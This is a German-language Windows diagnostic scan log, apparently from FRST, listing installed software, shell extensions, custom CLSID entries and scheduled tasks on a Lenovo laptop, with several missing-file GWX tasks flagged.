3DStudio Import 18 GER (HKLM\...\063FFF2FFF18FF00FF0201F01F02F000-R1) (Version: 18.0 - Graphisoft)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Flash Player 21 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 21.0.0.213 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
AmpegSVX (HKLM-x32\...\{CF1D7323-8A0A-49C7-83B0-088DB90721E2}) (Version: 1.1.0 - IK Multimedia)
AmpliTube 3 (HKLM-x32\...\{5DD152A8-BFB3-439E-90CD-5C00C2116E23}) (Version: 3.0.1 - IK Multimedia)
ArchiCAD 18 GER (HKLM\...\001FFF2FFF18FF00FF0201F01F02F000-R1) (Version: 18.0 - GRAPHISOFT)
Autodesk 3ds Max 2015 (HKLM\...\{52B37EC7-D836-0410-0264-3C24BCED2010}) (Version: 17.0.630.0 - Autodesk) Hidden
Autodesk 3ds Max 2015 (HKLM\...\Autodesk 3ds Max 2015) (Version: 17.0.630.0 - Autodesk)
Autodesk 3ds Max 2015 Populate Data (HKLM\...\{57E92DED-DC6C-41E5-B9E1-76D83BD2EABE}) (Version: 17.0.0.0 - Autodesk)
Autodesk Application Manager (HKLM-x32\...\Autodesk Application Manager) (Version: 1.0.59.0 - Autodesk)
Autodesk Backburner 2015 (HKLM-x32\...\{8C5F38D2-8EFE-49A4-B3F5-BF3210FED168}) (Version: 15.0.0.0 - Autodesk)
Autodesk DirectConnect 2015 64-bit (HKLM\...\{23C9ED7C-CB64-45FE-A7EA-1BA666F5589D}) (Version: 9.0.56.4 - Autodesk) Hidden
Autodesk DirectConnect 2015 64-bit (HKLM\...\Autodesk DirectConnect 2015 64-bit) (Version: 9.0.56.4 - Autodesk)
Autodesk Inventor Server Engine for 3ds Max 2015 (HKLM\...\{9167CA34-4E48-49E3-8892-3C439739D2D3}) (Version: 17.0 - Autodesk)
Autodesk Material Library 2015 (HKLM-x32\...\{427F733F-4D6C-45BC-9324-EB743104C321}) (Version: 5.2.9.100 - Autodesk)
Autodesk Material Library Base Resolution Image Library 2015 (HKLM-x32\...\{ABE2F70B-8D94-44E9-AA04-F0DB35063D62}) (Version: 5.2.9.100 - Autodesk)
Autodesk Material Library Medium Resolution Image Library 2015 (HKLM-x32\...\{9F6466D9-6EFC-4A10-B931-C72D1A3F1763}) (Version: 5.2.9.100 - Autodesk)
Autodesk Revit Interoperability for 3ds Max 2015 (HKLM\...\{0BB716E0-1500-0610-0000-097DC2F354DF}) (Version: 15.0.107.0 - Autodesk) Hidden
Autodesk Revit Interoperability for 3ds Max 2015 (HKLM\...\Autodesk Revit Interoperability for 3ds Max 2015) (Version: 15.0.107.0 - Autodesk)
CodeMeter Runtime Kit v5.10a (HKLM\...\{CADFF08A-A157-474F-B6A8-8F26F81F7ABE}) (Version: 5.10.1224.501 - WIBU-SYSTEMS AG)
Dolby Digital Plus Advanced Audio (HKLM\...\{B0BFC63F-EA07-419E-960B-3FB2ED5DD0B2}) (Version: 7.6.3.1 - Dolby Laboratories Inc)
Dropbox (HKLM-x32\...\Dropbox) (Version: 29.4.20 - Dropbox, Inc.)
Dropbox Update Helper (HKLM-x32\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.59.1 - Dropbox, Inc.) Hidden
Forest Pack Pro 4.3.6 (HKLM-x32\...\Forest Pack Pro) (Version: 4.3.6 - Itoo Software)
Intel Collaborative Processor Performance Control (HKLM-x32\...\0E7DAF70-FB54-4B91-B192-7E771C25AEEB) (Version: 1.0.0.1018 - Intel Corporation)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.3.1184 - Intel Corporation)
Intel(R) Network Connections Drivers (HKLM\...\PROSet) (Version: 20.2 - Intel)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation)
Intel(R) Wireless Bluetooth(R)(patch version 17.1.1532.1813) (HKLM\...\{302600C1-6BDF-4FD1-1507-148929CC1385}) (Version: 17.1.1507.0532 - Intel Corporation)
Intel® Chipsatz-Gerätesoftware (HKLM-x32\...\{f5d71765-7cd1-4e68-998f-5b379e725da3}) (Version: 10.0.22 - Intel(R) Corporation) Hidden
Intel® PROSet/Wireless Software (HKLM-x32\...\{185db067-38cd-4521-a43e-c39b96ee1389}) (Version: 19.50.1 - Intel Corporation)
Java 7 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217051FF}) (Version: 7.0.510 - Oracle)
Lenovo Anzeige am Bildschirm (HKLM\...\OnScreenDisplay) (Version: 8.80.10 - Lenovo) Hidden
Lenovo Power Management Driver (HKLM\...\Power Management Driver) (Version: 1.67.12.16 - Lenovo) Hidden
Lenovo QuickOptimizer (HKLM\...\{8D2C871B-1B9F-45AC-9C43-2BB18089CDFA}) (Version: 1.0.022.00 - Lenovo)
Lenovo Settings - Power (HKLM-x32\...\{A6CFC34A-56EE-4AF5-8C49-995F59E6A160}) (Version: 2.00.000 - Lenovo) Hidden
Lenovo Solution Center (HKLM\...\{C1FC707B-AE6B-4DC4-89A5-6628A01F8103}) (Version: 3.3.003.00 - Lenovo)
Lenovo System Interface Foundation Driver (HKLM\...\{C2E5CA37-C862-4A69-AC6D-24F450A20C16}) (Version: 1.0.078.00 - Lenovo)
Lexicon Omega Driver (HKLM\...\{2A837CDD-8FD6-4287-B82E-0664C90BB15A}) (Version: 2.7 - Lexicon) Hidden
Lexicon Omega Driver (HKLM-x32\...\Lexicon Omega Driver) (Version: 2.7 - Lexicon)
Metric Collection SDK (HKLM-x32\...\{DDAA788F-52E6-44EA-ADB8-92837B11BF26}) (Version: 1.1.0008.00 - Lenovo Group Limited) Hidden
Microsoft OneDrive (HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\...\OneDriveSetup.exe) (Version: 17.3.6917.0607 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
NVIDIA 3D Vision Treiber 354.45 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 354.45 - NVIDIA Corporation)
NVIDIA Grafiktreiber 354.45 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 354.45 - NVIDIA Corporation)
NVIDIA Update 10.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 10.4.0 - NVIDIA Corporation)
NVIDIA WMI 2.22.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVWMI) (Version: 2.22.0 - NVIDIA Corporation)
OpenOffice 4.1.2 (HKLM-x32\...\{F5CAB1AF-7B1A-4CEC-B829-A3F699473AE1}) (Version: 4.12.9782 - Apache Software Foundation)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.21236 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7614 - Realtek Semiconductor Corp.)
Rhinoceros 5 (64-bit) (HKLM\...\{141B55B6-73E2-4F3F-9F59-7C477F186311}) (Version: 5.7.31207.07545 - Robert McNeel & Associates)
ScummVM 1.8.0 (HKLM-x32\...\ScummVM_is1) (Version: - The ScummVM Team)
Skype™ 7.36 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.36.101 - Skype Technologies S.A.)
Spotify (HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\...\Spotify) (Version: 1.0.56.451.gb2f539fc - Spotify AB)
SRWare Iron (64-Bit) Version 48.2550.0 (HKLM\...\{BA85A29D-B48E-4826-BAEE-817024E52E29}_is1) (Version: 48.2550.0 - SRWare)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.17.115 - Synaptics Incorporated)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.72365 - TeamViewer)
ThinkPad Settings Dependency (HKLM\...\{08515684-CE49-47EF-B509-326A2E91BC5C}_is1) (Version: 3.0.1.29 - Lenovo) Hidden
T-RackS 3 Deluxe (HKLM-x32\...\{423C4130-EBC3-410A-B3A0-37BBF9D607D5}) (Version: 1.0.0 - IK Multimedia)
V-Ray for 3dsmax 2015 for x64 (HKLM\...\V-Ray for 3dsmax 2015 for x64) (Version: 3.20.03 - Chaos Software Ltd)
WibuKey Setup (WibuKey Remove) (HKLM\...\{00060000-0000-1004-8002-0000C06B5161}) (Version: Version 6.20 of 2013-Dec-18 (Build 1230) (Setup) - WIBU-SYSTEMS AG)
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
WinRAR 5.31 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
CustomCLSID: HKU\S-1-5-21-3349751938-1204465652-1694021483-1000_Classes\CLSID\{073CB204-6B29-46FC-AB98-451F1D068741}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2015\Inventor Server\Bin\TestServer.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-3349751938-1204465652-1694021483-1000_Classes\CLSID\{8C23B656-4E6E-4B45-9920-9617168D39A3}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2015\Inventor Server\Bin\TestServer.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-3349751938-1204465652-1694021483-1000_Classes\CLSID\{E5B0515D-48D2-4F04-906D-0192ED65A2DD}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2015\Inventor Server\Bin\TestServer.dll => Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.)
ContextMenuHandlers01: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ContextMenuHandlers01: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers01: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> Keine Datei
ContextMenuHandlers04: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ContextMenuHandlers05: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ContextMenuHandlers05: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Keine Datei
ContextMenuHandlers05: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2016-11-02] (Intel Corporation)
ContextMenuHandlers05: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-05-01] (NVIDIA Corporation)
ContextMenuHandlers06: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers06: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> Keine Datei
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {01D9090E-055B-47E6-9237-48A7AD893313} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {0348AA56-036B-49BD-ACA5-651D76113425} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {0B8AB8F7-A8C8-4648-837B-724FD28BB7EB} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {125C8702-F8E9-4607-A69A-827C81E217F3} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-02-23] (Dropbox, Inc.)
Task: {196313D9-F94B-4EBB-A563-871CC95A244F} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {20C24C14-DEEC-4084-8BC1-45364FEE0E6C} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => C:\Program Files (x86)\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe
Task: {2193CD8C-D45A-4571-AC73-2AFF7DDDCD65} - System32\Tasks\{D47AB256-778C-4756-BFF4-B5F38C8A441A} => pcalua.exe -a "C:\Program Files\World of Warcraft 1.12.1\WoW.exe" -d "C:\Program Files\World of Warcraft 1.12.1"
Task: {233D0047-31A5-40DE-8BC9-FCF166E1E548} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe
Task: {25DAF7F8-2048-43D9-9CA3-C335828F4532} - System32\Tasks\{C33EC7F1-7E6C-4635-A9D8-DE9B48C4F5F2} => pcalua.exe -a "C:\Program Files\World of Warcraft 2.4.3\Wow.exe" -d "C:\Program Files\World of Warcraft 2.4.3"
Task: {26E35CD2-4209-4156-AC41-5EBDBC503A9E} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\b4a09fe9-f559-4471-9e27-ab3aab0455dd => C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [2017-06-05] (Lenovo Group Limited)
Task: {2D27F44F-F282-4720-8EE9-5F2F758217F1} - System32\Tasks\RtHDVBg_LENOVO_MICPKEY => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2015-10-01] (Realtek Semiconductor)
Task: {330E747B-8045-43D9-AE55-D4C6B8254107} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {38C1E477-9549-4F3A-A622-DB2BE844D3FC} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {3E54759A-7D66-45F1-8D30-B4BDB68BB5F3} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {40F17ABB-21F3-4E9E-A06F-5CC9526E5080} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe
Task: {46AE9F37-C558-4167-B4AA-AC736E9BCF40} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {4C3A42E4-FB4F-40FE-9156-B276AA24C0BF} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {4F6CC665-D711-4615-BA99-3634BD84A3CB} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {57322CE1-EEEA-49A8-AFDE-2A814B78F3FF} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {5ADECB7F-4E8A-4A4A-8E48-B1A950E7EDF1} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {6229F9D6-65C1-4C81-B563-A8A011EE91D8} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {69ED972F-0507-43E0-B842-4ACC4A4C636A} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {6B4326C0-4369-475B-9BD7-660E928B9078} - System32\Tasks\Lenovo\LSC\LSCHardwareScan => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2016-06-02] (Lenovo)
Task: {72F2B2FA-6B40-427A-B40D-AD19949718D5} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_21_0_0_213_pepper.exe [2016-04-18] (Adobe Systems Incorporated)
Task: {7664EED0-BA9C-4AC1-BB8A-BE2EF3716B88} - System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask => reg.exe add hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler /v start /t reg_dword /d 1 /f /reg:32
Task: {7CF19C94-4370-4482-8B1C-31D7F80661CA} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {7F1D8057-FE69-4BE5-A7EC-D3EFD6DBEE01} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {82C043EC-E5CC-47E1-9692-0E00D829F248} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated)
Task: {844ACD9E-BD7D-474F-8117-6D90173B21F2} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe
Task: {8717EEF6-E532-4C6C-A532-CB26B350F2BF} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {8BD97214-F360-4555-B780-8E98A751D90A} - System32\Tasks\RtHDVBg_Dolby => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2015-10-01] (Realtek Semiconductor)
Task: {8E22DE0B-F51D-4116-A8E2-03F2E91E1B28} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2015-10-01] (Realtek Semiconductor)
Task: {985B667F-5809-47FB-B953-0CE916B386C7} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {99265848-09F9-4807-89BC-ADE8DED3AFE3} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance => Sc.exe START ImControllerService
Task: {9B828E07-B816-4CD7-ADFA-1B5F9AD26442} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
Task: {9FB0B6E1-8348-4D3C-8907-4EDA7C5340A5} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {AE4B9823-9A54-4135-ABA7-B40C512E17A4} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-02-23] (Dropbox, Inc.)
Task: {AE8D0CF6-2EF8-4189-BE67-995466304543} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {B086AE79-0D9E-4FE2-8014-D2007FD55A9F} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\b25dde1c-a139-4809-9f42-48306d3cf4b8 => C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [2017-06-05] (Lenovo Group Limited)
Task: {B6057C25-D59A-4344-A92A-B2034A515A19} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
Task: {B977E6C5-B009-48BD-B2AA-DC32B1E763AF} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe
Task: {B9F5F195-100B-41F3-BF0C-58B05B9B4103} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\iCLS Client\IntelPTTEKRecertification.exe [2016-02-19] (Intel(R) Corporation)
Task: {BB42B4FB-073D-45F9-A76B-1212343A6AC1} - \Microsoft\Windows\Setup\GWXTriggers\Logon-URT -> Keine Datei <==== ACHTUNG
Task: {C2546E5D-79C2-4541-9E39-E0D6ED7AAE71} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Keine Datei <==== ACHTUNG
